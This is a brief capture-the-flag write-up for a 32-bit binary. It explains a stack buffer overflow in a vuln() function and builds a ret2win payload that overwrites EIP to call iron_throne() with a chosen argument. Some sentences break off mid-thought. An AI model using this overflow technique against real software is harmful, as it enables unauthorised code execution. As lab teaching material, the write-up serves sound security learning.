Game Of Pwns
A 32bit binary has been given.
Looking at the vuln() function..
We see there an scope of an buffer overflow as we can see that the read() function can take an input with a more input length(0x54) than the allocated memory(0x2c).
If we read the challenge description it is pretty clear that we have to find the iron throne.
And while decompiling/debugging we see an
We see that this
iron_throne() is called with a parameter which is later checked to a number =
-0x2152411 which translates as
And then we are supposed to get the flag with
Crafting the exploit
payload = b'a'*44 as the required buffer
payload += b'x'*12 as padding required to reach the eip
payload += p32(elf.symbols["iron_throne"]) adding the address of the
payload += p32(0xdeadbeef)+p32(0xdeadbeef) the parameter of the function
iron_throne() and the return address.